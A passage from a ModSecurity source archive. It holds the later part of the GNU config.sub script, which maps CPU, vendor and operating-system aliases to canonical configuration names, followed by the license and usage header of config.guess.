pjl \ | powerpc | powerpc64 | powerpc64le | powerpcle \ | pru \ | pyramid \ | riscv32 | riscv64 \ | rl78 | rx \ | score \ | sh | sh[1234] | sh[24]a | sh[24]aeb | sh[23]e | sh[234]eb | sheb | shbe | shle | sh[1234]le | sh3ele \ | sh64 | sh64le \ | sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \ | sparcv8 | sparcv9 | sparcv9b | sparcv9v \ | spu \ | tahoe | tic4x | tic54x | tic55x | tic6x | tic80 | tron \ | ubicom32 \ | v850 | v850e | v850e1 | v850e2 | v850es | v850e2v3 \ | visium \ | wasm32 \ | x86 | xc16x | xstormy16 | xtensa \ | z8k | z80) basic_machine=$basic_machine-unknown ;; c54x) basic_machine=tic54x-unknown ;; c55x) basic_machine=tic55x-unknown ;; c6x) basic_machine=tic6x-unknown ;; leon|leon[3-9]) basic_machine=sparc-$basic_machine ;; m6811 | m68hc11 | m6812 | m68hc12 | m68hcs12x | nvptx | picochip) basic_machine=$basic_machine-unknown os=-none ;; m88110 | m680[12346]0 | m683?2 | m68360 | m5200 | v70 | w65) ;; ms1) basic_machine=mt-unknown ;; strongarm | thumb | xscale) basic_machine=arm-unknown ;; xgate) basic_machine=$basic_machine-unknown os=-none ;; xscaleeb) basic_machine=armeb-unknown ;; xscaleel) basic_machine=armel-unknown ;; # We use `pc' rather than `unknown' # because (1) that's what they normally are, and # (2) the word "unknown" tends to confuse beginning users. i*86 | x86_64) basic_machine=$basic_machine-pc ;; # Object if more than one company name word. *-*-*) echo Invalid configuration \`"$1"\': machine \`"$basic_machine"\' not recognized 1>&2 exit 1 ;; # Recognize the basic CPU types with company name. 580-* \ | a29k-* \ | aarch64-* | aarch64_be-* \ | alpha-* | alphaev[4-8]-* | alphaev56-* | alphaev6[78]-* \ | alpha64-* | alpha64ev[4-8]-* | alpha64ev56-* | alpha64ev6[78]-* \ | alphapca5[67]-* | alpha64pca5[67]-* | arc-* | arceb-* \ | arm-* | armbe-* | armle-* | armeb-* | armv*-* \ | avr-* | avr32-* \ | ba-* \ | be32-* | be64-* \ | bfin-* | bs2000-* \ | c[123]* | c30-* | [cjt]90-* | c4x-* \ | c8051-* | clipper-* | craynv-* | cydra-* \ | d10v-* | d30v-* | dlx-* \ | e2k-* | elxsi-* \ | f30[01]-* | f700-* | fido-* | fr30-* | frv-* | fx80-* \ | h8300-* | h8500-* \ | hppa-* | hppa1.[01]-* | hppa2.0-* | hppa2.0[nw]-* | hppa64-* \ | hexagon-* \ | i*86-* | i860-* | i960-* | ia16-* | ia64-* \ | ip2k-* | iq2000-* \ | k1om-* \ | le32-* | le64-* \ | lm32-* \ | m32c-* | m32r-* | m32rle-* \ | m68000-* | m680[012346]0-* | m68360-* | m683?2-* | m68k-* \ | m88110-* | m88k-* | maxq-* | mcore-* | metag-* \ | microblaze-* | microblazeel-* \ | mips-* | mipsbe-* | mipseb-* | mipsel-* | mipsle-* \ | mips16-* \ | mips64-* | mips64el-* \ | mips64octeon-* | mips64octeonel-* \ | mips64orion-* | mips64orionel-* \ | mips64r5900-* | mips64r5900el-* \ | mips64vr-* | mips64vrel-* \ | mips64vr4100-* | mips64vr4100el-* \ | mips64vr4300-* | mips64vr4300el-* \ | mips64vr5000-* | mips64vr5000el-* \ | mips64vr5900-* | mips64vr5900el-* \ | mipsisa32-* | mipsisa32el-* \ | mipsisa32r2-* | mipsisa32r2el-* \ | mipsisa32r6-* | mipsisa32r6el-* \ | mipsisa64-* | mipsisa64el-* \ | mipsisa64r2-* | mipsisa64r2el-* \ | mipsisa64r6-* | mipsisa64r6el-* \ | mipsisa64sb1-* | mipsisa64sb1el-* \ | mipsisa64sr71k-* | mipsisa64sr71kel-* \ | mipsr5900-* | mipsr5900el-* \ | mipstx39-* | mipstx39el-* \ | mmix-* \ | mt-* \ | msp430-* \ | nds32-* | nds32le-* | nds32be-* \ | nios-* | nios2-* | nios2eb-* | nios2el-* \ | none-* | np1-* | ns16k-* | ns32k-* \ | open8-* \ | or1k*-* \ | orion-* \ | pdp10-* | pdp11-* | pj-* | pjl-* | pn-* | power-* \ | powerpc-* | powerpc64-* | powerpc64le-* | powerpcle-* \ | pru-* \ | pyramid-* \ | riscv32-* | riscv64-* \ | rl78-* | romp-* | rs6000-* | rx-* \ | sh-* | sh[1234]-* | sh[24]a-* | sh[24]aeb-* | sh[23]e-* | sh[34]eb-* | sheb-* | shbe-* \ | shle-* | sh[1234]le-* | sh3ele-* | sh64-* | sh64le-* \ | sparc-* | sparc64-* | sparc64b-* | sparc64v-* | sparc86x-* | sparclet-* \ | sparclite-* \ | sparcv8-* | sparcv9-* | sparcv9b-* | sparcv9v-* | sv1-* | sx*-* \ | tahoe-* \ | tic30-* | tic4x-* | tic54x-* | tic55x-* | tic6x-* | tic80-* \ | tile*-* \ | tron-* \ | ubicom32-* \ | v850-* | v850e-* | v850e1-* | v850es-* | v850e2-* | v850e2v3-* \ | vax-* \ | visium-* \ | wasm32-* \ | we32k-* \ | x86-* | x86_64-* | xc16x-* | xps100-* \ | xstormy16-* | xtensa*-* \ | ymp-* \ | z8k-* | z80-*) ;; # Recognize the basic CPU types without company name, with glob match. xtensa*) basic_machine=$basic_machine-unknown ;; # Recognize the various machine names and aliases which stand # for a CPU type and a company and sometimes even an OS. 386bsd) basic_machine=i386-pc os=-bsd ;; 3b1 | 7300 | 7300-att | att-7300 | pc7300 | safari | unixpc) basic_machine=m68000-att ;; 3b*) basic_machine=we32k-att ;; a29khif) basic_machine=a29k-amd os=-udi ;; abacus) basic_machine=abacus-unknown ;; adobe68k) basic_machine=m68010-adobe os=-scout ;; alliant | fx80) basic_machine=fx80-alliant ;; altos | altos3068) basic_machine=m68k-altos ;; am29k) basic_machine=a29k-none os=-bsd ;; amd64) basic_machine=x86_64-pc ;; amd64-*) basic_machine=x86_64-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; amdahl) basic_machine=580-amdahl os=-sysv ;; amiga | amiga-*) basic_machine=m68k-unknown ;; amigaos | amigados) basic_machine=m68k-unknown os=-amigaos ;; amigaunix | amix) basic_machine=m68k-unknown os=-sysv4 ;; apollo68) basic_machine=m68k-apollo os=-sysv ;; apollo68bsd) basic_machine=m68k-apollo os=-bsd ;; aros) basic_machine=i386-pc os=-aros ;; asmjs) basic_machine=asmjs-unknown ;; aux) basic_machine=m68k-apple os=-aux ;; balance) basic_machine=ns32k-sequent os=-dynix ;; blackfin) basic_machine=bfin-unknown os=-linux ;; blackfin-*) basic_machine=bfin-`echo "$basic_machine" | sed 's/^[^-]*-//'` os=-linux ;; bluegene*) basic_machine=powerpc-ibm os=-cnk ;; c54x-*) basic_machine=tic54x-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; c55x-*) basic_machine=tic55x-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; c6x-*) basic_machine=tic6x-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; c90) basic_machine=c90-cray os=-unicos ;; cegcc) basic_machine=arm-unknown os=-cegcc ;; convex-c1) basic_machine=c1-convex os=-bsd ;; convex-c2) basic_machine=c2-convex os=-bsd ;; convex-c32) basic_machine=c32-convex os=-bsd ;; convex-c34) basic_machine=c34-convex os=-bsd ;; convex-c38) basic_machine=c38-convex os=-bsd ;; cray | j90) basic_machine=j90-cray os=-unicos ;; craynv) basic_machine=craynv-cray os=-unicosmp ;; cr16 | cr16-*) basic_machine=cr16-unknown os=-elf ;; crds | unos) basic_machine=m68k-crds ;; crisv32 | crisv32-* | etraxfs*) basic_machine=crisv32-axis ;; cris | cris-* | etrax*) basic_machine=cris-axis ;; crx) basic_machine=crx-unknown os=-elf ;; da30 | da30-*) basic_machine=m68k-da30 ;; decstation | decstation-3100 | pmax | pmax-* | pmin | dec3100 | decstatn) basic_machine=mips-dec ;; decsystem10* | dec10*) basic_machine=pdp10-dec os=-tops10 ;; decsystem20* | dec20*) basic_machine=pdp10-dec os=-tops20 ;; delta | 3300 | motorola-3300 | motorola-delta \ | 3300-motorola | delta-motorola) basic_machine=m68k-motorola ;; delta88) basic_machine=m88k-motorola os=-sysv3 ;; dicos) basic_machine=i686-pc os=-dicos ;; djgpp) basic_machine=i586-pc os=-msdosdjgpp ;; dpx20 | dpx20-*) basic_machine=rs6000-bull os=-bosx ;; dpx2*) basic_machine=m68k-bull os=-sysv3 ;; e500v[12]) basic_machine=powerpc-unknown os=$os"spe" ;; e500v[12]-*) basic_machine=powerpc-`echo "$basic_machine" | sed 's/^[^-]*-//'` os=$os"spe" ;; ebmon29k) basic_machine=a29k-amd os=-ebmon ;; elxsi) basic_machine=elxsi-elxsi os=-bsd ;; encore | umax | mmax) basic_machine=ns32k-encore ;; es1800 | OSE68k | ose68k | ose | OSE) basic_machine=m68k-ericsson os=-ose ;; fx2800) basic_machine=i860-alliant ;; genix) basic_machine=ns32k-ns ;; gmicro) basic_machine=tron-gmicro os=-sysv ;; go32) basic_machine=i386-pc os=-go32 ;; h3050r* | hiux*) basic_machine=hppa1.1-hitachi os=-hiuxwe2 ;; h8300hms) basic_machine=h8300-hitachi os=-hms ;; h8300xray) basic_machine=h8300-hitachi os=-xray ;; h8500hms) basic_machine=h8500-hitachi os=-hms ;; harris) basic_machine=m88k-harris os=-sysv3 ;; hp300-*) basic_machine=m68k-hp ;; hp300bsd) basic_machine=m68k-hp os=-bsd ;; hp300hpux) basic_machine=m68k-hp os=-hpux ;; hp3k9[0-9][0-9] | hp9[0-9][0-9]) basic_machine=hppa1.0-hp ;; hp9k2[0-9][0-9] | hp9k31[0-9]) basic_machine=m68000-hp ;; hp9k3[2-9][0-9]) basic_machine=m68k-hp ;; hp9k6[0-9][0-9] | hp6[0-9][0-9]) basic_machine=hppa1.0-hp ;; hp9k7[0-79][0-9] | hp7[0-79][0-9]) basic_machine=hppa1.1-hp ;; hp9k78[0-9] | hp78[0-9]) # FIXME: really hppa2.0-hp basic_machine=hppa1.1-hp ;; hp9k8[67]1 | hp8[67]1 | hp9k80[24] | hp80[24] | hp9k8[78]9 | hp8[78]9 | hp9k893 | hp893) # FIXME: really hppa2.0-hp basic_machine=hppa1.1-hp ;; hp9k8[0-9][13679] | hp8[0-9][13679]) basic_machine=hppa1.1-hp ;; hp9k8[0-9][0-9] | hp8[0-9][0-9]) basic_machine=hppa1.0-hp ;; hppaosf) basic_machine=hppa1.1-hp os=-osf ;; hppro) basic_machine=hppa1.1-hp os=-proelf ;; i370-ibm* | ibm*) basic_machine=i370-ibm ;; i*86v32) basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'` os=-sysv32 ;; i*86v4*) basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'` os=-sysv4 ;; i*86v) basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'` os=-sysv ;; i*86sol2) basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'` os=-solaris2 ;; i386mach) basic_machine=i386-mach os=-mach ;; vsta) basic_machine=i386-unknown os=-vsta ;; iris | iris4d) basic_machine=mips-sgi case $os in -irix*) ;; *) os=-irix4 ;; esac ;; isi68 | isi) basic_machine=m68k-isi os=-sysv ;; leon-*|leon[3-9]-*) basic_machine=sparc-`echo "$basic_machine" | sed 's/-.*//'` ;; m68knommu) basic_machine=m68k-unknown os=-linux ;; m68knommu-*) basic_machine=m68k-`echo "$basic_machine" | sed 's/^[^-]*-//'` os=-linux ;; magnum | m3230) basic_machine=mips-mips os=-sysv ;; merlin) basic_machine=ns32k-utek os=-sysv ;; microblaze*) basic_machine=microblaze-xilinx ;; mingw64) basic_machine=x86_64-pc os=-mingw64 ;; mingw32) basic_machine=i686-pc os=-mingw32 ;; mingw32ce) basic_machine=arm-unknown os=-mingw32ce ;; miniframe) basic_machine=m68000-convergent ;; *mint | -mint[0-9]* | *MiNT | *MiNT[0-9]*) basic_machine=m68k-atari os=-mint ;; mips3*-*) basic_machine=`echo "$basic_machine" | sed -e 's/mips3/mips64/'` ;; mips3*) basic_machine=`echo "$basic_machine" | sed -e 's/mips3/mips64/'`-unknown ;; monitor) basic_machine=m68k-rom68k os=-coff ;; morphos) basic_machine=powerpc-unknown os=-morphos ;; moxiebox) basic_machine=moxie-unknown os=-moxiebox ;; msdos) basic_machine=i386-pc os=-msdos ;; ms1-*) basic_machine=`echo "$basic_machine" | sed -e 's/ms1-/mt-/'` ;; msys) basic_machine=i686-pc os=-msys ;; mvs) basic_machine=i370-ibm os=-mvs ;; nacl) basic_machine=le32-unknown os=-nacl ;; ncr3000) basic_machine=i486-ncr os=-sysv4 ;; netbsd386) basic_machine=i386-unknown os=-netbsd ;; netwinder) basic_machine=armv4l-rebel os=-linux ;; news | news700 | news800 | news900) basic_machine=m68k-sony os=-newsos ;; news1000) basic_machine=m68030-sony os=-newsos ;; news-3600 | risc-news) basic_machine=mips-sony os=-newsos ;; necv70) basic_machine=v70-nec os=-sysv ;; next | m*-next) basic_machine=m68k-next case $os in -nextstep* ) ;; -ns2*) os=-nextstep2 ;; *) os=-nextstep3 ;; esac ;; nh3000) basic_machine=m68k-harris os=-cxux ;; nh[45]000) basic_machine=m88k-harris os=-cxux ;; nindy960) basic_machine=i960-intel os=-nindy ;; mon960) basic_machine=i960-intel os=-mon960 ;; nonstopux) basic_machine=mips-compaq os=-nonstopux ;; np1) basic_machine=np1-gould ;; neo-tandem) basic_machine=neo-tandem ;; nse-tandem) basic_machine=nse-tandem ;; nsr-tandem) basic_machine=nsr-tandem ;; nsv-tandem) basic_machine=nsv-tandem ;; nsx-tandem) basic_machine=nsx-tandem ;; op50n-* | op60c-*) basic_machine=hppa1.1-oki os=-proelf ;; openrisc | openrisc-*) basic_machine=or32-unknown ;; os400) basic_machine=powerpc-ibm os=-os400 ;; OSE68000 | ose68000) basic_machine=m68000-ericsson os=-ose ;; os68k) basic_machine=m68k-none os=-os68k ;; pa-hitachi) basic_machine=hppa1.1-hitachi os=-hiuxwe2 ;; paragon) basic_machine=i860-intel os=-osf ;; parisc) basic_machine=hppa-unknown os=-linux ;; parisc-*) basic_machine=hppa-`echo "$basic_machine" | sed 's/^[^-]*-//'` os=-linux ;; pbd) basic_machine=sparc-tti ;; pbb) basic_machine=m68k-tti ;; pc532 | pc532-*) basic_machine=ns32k-pc532 ;; pc98) basic_machine=i386-pc ;; pc98-*) basic_machine=i386-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; pentium | p5 | k5 | k6 | nexgen | viac3) basic_machine=i586-pc ;; pentiumpro | p6 | 6x86 | athlon | athlon_*) basic_machine=i686-pc ;; pentiumii | pentium2 | pentiumiii | pentium3) basic_machine=i686-pc ;; pentium4) basic_machine=i786-pc ;; pentium-* | p5-* | k5-* | k6-* | nexgen-* | viac3-*) basic_machine=i586-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; pentiumpro-* | p6-* | 6x86-* | athlon-*) basic_machine=i686-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; pentiumii-* | pentium2-* | pentiumiii-* | pentium3-*) basic_machine=i686-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; pentium4-*) basic_machine=i786-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; pn) basic_machine=pn-gould ;; power) basic_machine=power-ibm ;; ppc | ppcbe) basic_machine=powerpc-unknown ;; ppc-* | ppcbe-*) basic_machine=powerpc-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; ppcle | powerpclittle) basic_machine=powerpcle-unknown ;; ppcle-* | powerpclittle-*) basic_machine=powerpcle-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; ppc64) basic_machine=powerpc64-unknown ;; ppc64-*) basic_machine=powerpc64-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; ppc64le | powerpc64little) basic_machine=powerpc64le-unknown ;; ppc64le-* | powerpc64little-*) basic_machine=powerpc64le-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; ps2) basic_machine=i386-ibm ;; pw32) basic_machine=i586-unknown os=-pw32 ;; rdos | rdos64) basic_machine=x86_64-pc os=-rdos ;; rdos32) basic_machine=i386-pc os=-rdos ;; rom68k) basic_machine=m68k-rom68k os=-coff ;; rm[46]00) basic_machine=mips-siemens ;; rtpc | rtpc-*) basic_machine=romp-ibm ;; s390 | s390-*) basic_machine=s390-ibm ;; s390x | s390x-*) basic_machine=s390x-ibm ;; sa29200) basic_machine=a29k-amd os=-udi ;; sb1) basic_machine=mipsisa64sb1-unknown ;; sb1el) basic_machine=mipsisa64sb1el-unknown ;; sde) basic_machine=mipsisa32-sde os=-elf ;; sei) basic_machine=mips-sei os=-seiux ;; sequent) basic_machine=i386-sequent ;; sh5el) basic_machine=sh5le-unknown ;; simso-wrs) basic_machine=sparclite-wrs os=-vxworks ;; sps7) basic_machine=m68k-bull os=-sysv2 ;; spur) basic_machine=spur-unknown ;; st2000) basic_machine=m68k-tandem ;; stratus) basic_machine=i860-stratus os=-sysv4 ;; strongarm-* | thumb-*) basic_machine=arm-`echo "$basic_machine" | sed 's/^[^-]*-//'` ;; sun2) basic_machine=m68000-sun ;; sun2os3) basic_machine=m68000-sun os=-sunos3 ;; sun2os4) basic_machine=m68000-sun os=-sunos4 ;; sun3os3) basic_machine=m68k-sun os=-sunos3 ;; sun3os4) basic_machine=m68k-sun os=-sunos4 ;; sun4os3) basic_machine=sparc-sun os=-sunos3 ;; sun4os4) basic_machine=sparc-sun os=-sunos4 ;; sun4sol2) basic_machine=sparc-sun os=-solaris2 ;; sun3 | sun3-*) basic_machine=m68k-sun ;; sun4) basic_machine=sparc-sun ;; sun386 | sun386i | roadrunner) basic_machine=i386-sun ;; sv1) basic_machine=sv1-cray os=-unicos ;; symmetry) basic_machine=i386-sequent os=-dynix ;; t3e) basic_machine=alphaev5-cray os=-unicos ;; t90) basic_machine=t90-cray os=-unicos ;; tile*) basic_machine=$basic_machine-unknown os=-linux-gnu ;; tx39) basic_machine=mipstx39-unknown ;; tx39el) basic_machine=mipstx39el-unknown ;; toad1) basic_machine=pdp10-xkl os=-tops20 ;; tower | tower-32) basic_machine=m68k-ncr ;; tpf) basic_machine=s390x-ibm os=-tpf ;; udi29k) basic_machine=a29k-amd os=-udi ;; ultra3) basic_machine=a29k-nyu os=-sym1 ;; v810 | necv810) basic_machine=v810-nec os=-none ;; vaxv) basic_machine=vax-dec os=-sysv ;; vms) basic_machine=vax-dec os=-vms ;; vpp*|vx|vx-*) basic_machine=f301-fujitsu ;; vxworks960) basic_machine=i960-wrs os=-vxworks ;; vxworks68) basic_machine=m68k-wrs os=-vxworks ;; vxworks29k) basic_machine=a29k-wrs os=-vxworks ;; w65*) basic_machine=w65-wdc os=-none ;; w89k-*) basic_machine=hppa1.1-winbond os=-proelf ;; x64) basic_machine=x86_64-pc ;; xbox) basic_machine=i686-pc os=-mingw32 ;; xps | xps100) basic_machine=xps100-honeywell ;; xscale-* | xscalee[bl]-*) basic_machine=`echo "$basic_machine" | sed 's/^xscale/arm/'` ;; ymp) basic_machine=ymp-cray os=-unicos ;; none) basic_machine=none-none os=-none ;; # Here we handle the default manufacturer of certain CPU types. It is in # some cases the only manufacturer, in others, it is the most popular. w89k) basic_machine=hppa1.1-winbond ;; op50n) basic_machine=hppa1.1-oki ;; op60c) basic_machine=hppa1.1-oki ;; romp) basic_machine=romp-ibm ;; mmix) basic_machine=mmix-knuth ;; rs6000) basic_machine=rs6000-ibm ;; vax) basic_machine=vax-dec ;; pdp11) basic_machine=pdp11-dec ;; we32k) basic_machine=we32k-att ;; sh[1234] | sh[24]a | sh[24]aeb | sh[34]eb | sh[1234]le | sh[23]ele) basic_machine=sh-unknown ;; cydra) basic_machine=cydra-cydrome ;; orion) basic_machine=orion-highlevel ;; orion105) basic_machine=clipper-highlevel ;; mac | mpw | mac-mpw) basic_machine=m68k-apple ;; pmac | pmac-mpw) basic_machine=powerpc-apple ;; *-unknown) # Make sure to match an already-canonicalized machine name. ;; *) echo Invalid configuration \`"$1"\': machine \`"$basic_machine"\' not recognized 1>&2 exit 1 ;; esac # Here we canonicalize certain aliases for manufacturers. case $basic_machine in *-digital*) basic_machine=`echo "$basic_machine" | sed 's/digital.*/dec/'` ;; *-commodore*) basic_machine=`echo "$basic_machine" | sed 's/commodore.*/cbm/'` ;; *) ;; esac # Decode manufacturer-specific aliases for certain operating systems. if [ x"$os" != x"" ] then case $os in # First match some system type aliases that might get confused # with valid system types. # -solaris* is a basic system type, with this one exception. -auroraux) os=-auroraux ;; -solaris1 | -solaris1.*) os=`echo $os | sed -e 's|solaris1|sunos4|'` ;; -solaris) os=-solaris2 ;; -unixware*) os=-sysv4.2uw ;; -gnu/linux*) os=`echo $os | sed -e 's|gnu/linux|linux-gnu|'` ;; # es1800 is here to avoid being matched by es* (a different OS) -es1800*) os=-ose ;; # Now accept the basic system types. # The portable systems comes first. # Each alternative MUST end in a * to match a version number. # -sysv* is not here because it comes later, after sysvr4. -gnu* | -bsd* | -mach* | -minix* | -genix* | -ultrix* | -irix* \ | -*vms* | -sco* | -esix* | -isc* | -aix* | -cnk* | -sunos | -sunos[34]*\ | -hpux* | -unos* | -osf* | -luna* | -dgux* | -auroraux* | -solaris* \ | -sym* | -kopensolaris* | -plan9* \ | -amigaos* | -amigados* | -msdos* | -newsos* | -unicos* | -aof* \ | -aos* | -aros* | -cloudabi* | -sortix* \ | -nindy* | -vxsim* | -vxworks* | -ebmon* | -hms* | -mvs* \ | -clix* | -riscos* | -uniplus* | -iris* | -rtu* | -xenix* \ | -hiux* | -knetbsd* | -mirbsd* | -netbsd* \ | -bitrig* | -openbsd* | -solidbsd* | -libertybsd* \ | -ekkobsd* | -kfreebsd* | -freebsd* | -riscix* | -lynxos* \ | -bosx* | -nextstep* | -cxux* | -aout* | -elf* | -oabi* \ | -ptx* | -coff* | -ecoff* | -winnt* | -domain* | -vsta* \ | -udi* | -eabi* | -lites* | -ieee* | -go32* | -aux* | -hcos* \ | -chorusos* | -chorusrdb* | -cegcc* | -glidix* \ | -cygwin* | -msys* | -pe* | -psos* | -moss* | -proelf* | -rtems* \ | -midipix* | -mingw32* | -mingw64* | -linux-gnu* | -linux-android* \ | -linux-newlib* | -linux-musl* | -linux-uclibc* \ | -uxpv* | -beos* | -mpeix* | -udk* | -moxiebox* \ | -interix* | -uwin* | -mks* | -rhapsody* | -darwin* \ | -openstep* | -oskit* | -conix* | -pw32* | -nonstopux* \ | -storm-chaos* | -tops10* | -tenex* | -tops20* | -its* \ | -os2* | -vos* | -palmos* | -uclinux* | -nucleus* \ | -morphos* | -superux* | -rtmk* | -windiss* \ | -powermax* | -dnix* | -nx6 | -nx7 | -sei* | -dragonfly* \ | -skyos* | -haiku* | -rdos* | -toppers* | -drops* | -es* \ | -onefs* | -tirtos* | -phoenix* | -fuchsia* | -redox* | -bme* \ | -midnightbsd*) # Remember, each alternative MUST END IN *, to match a version number. ;; -qnx*) case $basic_machine in x86-* | i*86-*) ;; *) os=-nto$os ;; esac ;; -nto-qnx*) ;; -nto*) os=`echo $os | sed -e 's|nto|nto-qnx|'` ;; -sim | -xray | -os68k* | -v88r* \ | -windows* | -osx | -abug | -netware* | -os9* \ | -macos* | -mpw* | -magic* | -mmixware* | -mon960* | -lnews*) ;; -mac*) os=`echo "$os" | sed -e 's|mac|macos|'` ;; -linux-dietlibc) os=-linux-dietlibc ;; -linux*) os=`echo $os | sed -e 's|linux|linux-gnu|'` ;; -sunos5*) os=`echo "$os" | sed -e 's|sunos5|solaris2|'` ;; -sunos6*) os=`echo "$os" | sed -e 's|sunos6|solaris3|'` ;; -opened*) os=-openedition ;; -os400*) os=-os400 ;; -wince*) os=-wince ;; -utek*) os=-bsd ;; -dynix*) os=-bsd ;; -acis*) os=-aos ;; -atheos*) os=-atheos ;; -syllable*) os=-syllable ;; -386bsd) os=-bsd ;; -ctix* | -uts*) os=-sysv ;; -nova*) os=-rtmk-nova ;; -ns2) os=-nextstep2 ;; -nsk*) os=-nsk ;; # Preserve the version number of sinix5. -sinix5.*) os=`echo $os | sed -e 's|sinix|sysv|'` ;; -sinix*) os=-sysv4 ;; -tpf*) os=-tpf ;; -triton*) os=-sysv3 ;; -oss*) os=-sysv3 ;; -svr4*) os=-sysv4 ;; -svr3) os=-sysv3 ;; -sysvr4) os=-sysv4 ;; # This must come after -sysvr4. -sysv*) ;; -ose*) os=-ose ;; -*mint | -mint[0-9]* | -*MiNT | -MiNT[0-9]*) os=-mint ;; -zvmoe) os=-zvmoe ;; -dicos*) os=-dicos ;; -pikeos*) # Until real need of OS specific support for # particular features comes up, bare metal # configurations are quite functional. case $basic_machine in arm*) os=-eabi ;; *) os=-elf ;; esac ;; -nacl*) ;; -ios) ;; -none) ;; *) # Get rid of the `-' at the beginning of $os. os=`echo $os | sed 's/[^-]*-//'` echo Invalid configuration \`"$1"\': system \`"$os"\' not recognized 1>&2 exit 1 ;; esac else # Here we handle the default operating systems that come with various machines. # The value should be what the vendor currently ships out the door with their # machine or put another way, the most popular os provided with the machine. # Note that if you're going to try to match "-MANUFACTURER" here (say, # "-sun"), then you have to tell the case statement up towards the top # that MANUFACTURER isn't an operating system. Otherwise, code above # will signal an error saying that MANUFACTURER isn't an operating # system, and we'll never get to this point. case $basic_machine in score-*) os=-elf ;; spu-*) os=-elf ;; *-acorn) os=-riscix1.2 ;; arm*-rebel) os=-linux ;; arm*-semi) os=-aout ;; c4x-* | tic4x-*) os=-coff ;; c8051-*) os=-elf ;; hexagon-*) os=-elf ;; tic54x-*) os=-coff ;; tic55x-*) os=-coff ;; tic6x-*) os=-coff ;; # This must come before the *-dec entry. pdp10-*) os=-tops20 ;; pdp11-*) os=-none ;; *-dec | vax-*) os=-ultrix4.2 ;; m68*-apollo) os=-domain ;; i386-sun) os=-sunos4.0.2 ;; m68000-sun) os=-sunos3 ;; m68*-cisco) os=-aout ;; mep-*) os=-elf ;; mips*-cisco) os=-elf ;; mips*-*) os=-elf ;; or32-*) os=-coff ;; *-tti) # must be before sparc entry or we get the wrong os. os=-sysv3 ;; sparc-* | *-sun) os=-sunos4.1.1 ;; pru-*) os=-elf ;; *-be) os=-beos ;; *-ibm) os=-aix ;; *-knuth) os=-mmixware ;; *-wec) os=-proelf ;; *-winbond) os=-proelf ;; *-oki) os=-proelf ;; *-hp) os=-hpux ;; *-hitachi) os=-hiux ;; i860-* | *-att | *-ncr | *-altos | *-motorola | *-convergent) os=-sysv ;; *-cbm) os=-amigaos ;; *-dg) os=-dgux ;; *-dolphin) os=-sysv3 ;; m68k-ccur) os=-rtu ;; m88k-omron*) os=-luna ;; *-next) os=-nextstep ;; *-sequent) os=-ptx ;; *-crds) os=-unos ;; *-ns) os=-genix ;; i370-*) os=-mvs ;; *-gould) os=-sysv ;; *-highlevel) os=-bsd ;; *-encore) os=-bsd ;; *-sgi) os=-irix ;; *-siemens) os=-sysv4 ;; *-masscomp) os=-rtu ;; f30[01]-fujitsu | f700-fujitsu) os=-uxpv ;; *-rom68k) os=-coff ;; *-*bug) os=-coff ;; *-apple) os=-macos ;; *-atari*) os=-mint ;; *) os=-none ;; esac fi # Here we handle the case where we know the os, and the CPU type, but not the # manufacturer. We pick the logical manufacturer. vendor=unknown case $basic_machine in *-unknown) case $os in -riscix*) vendor=acorn ;; -sunos*) vendor=sun ;; -cnk*|-aix*) vendor=ibm ;; -beos*) vendor=be ;; -hpux*) vendor=hp ;; -mpeix*) vendor=hp ;; -hiux*) vendor=hitachi ;; -unos*) vendor=crds ;; -dgux*) vendor=dg ;; -luna*) vendor=omron ;; -genix*) vendor=ns ;; -mvs* | -opened*) vendor=ibm ;; -os400*) vendor=ibm ;; -ptx*) vendor=sequent ;; -tpf*) vendor=ibm ;; -vxsim* | -vxworks* | -windiss*) vendor=wrs ;; -aux*) vendor=apple ;; -hms*) vendor=hitachi ;; -mpw* | -macos*) vendor=apple ;; -*mint | -mint[0-9]* | -*MiNT | -MiNT[0-9]*) vendor=atari ;; -vos*) vendor=stratus ;; esac basic_machine=`echo "$basic_machine" | sed "s/unknown/$vendor/"` ;; esac echo "$basic_machine$os" exit # Local variables: # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "timestamp='" # time-stamp-format: "%:y-%02m-%02d" # time-stamp-end: "'" # End: modsecurity-v3.0.4/config.guess0000755000175000017500000012620613607066346017047 0ustar zimmerlezimmerle#! /bin/sh # Attempt to guess a canonical system name. # Copyright 1992-2018 Free Software Foundation, Inc. timestamp='2018-03-08' # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see . # # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that # program. This Exception is an additional permission under section 7 # of the GNU General Public License, version 3 ("GPLv3"). # # Originally written by Per Bothner; maintained since 2000 by Ben Elliston. # # You can get the latest version of this script from: # https://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.guess # # Please send patches to . me=`echo "$0" | sed -e 's,.*/,,'` usage="\ Usage: $0 [OPTION] Output the configuration name of the system \`$me' is run on. Options: -h, --help print this help, then exit -t, --time-stamp print date of last modification, then exit -v, --version print version number, then exit Report bugs and patches to ." version="\ GNU config.guess ($timestamp) Originally written by Per Bothner. Copyright 1992-2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE." help=" Try \`$me --help' for more information." # Parse command line while test $# -gt 0 ; do case 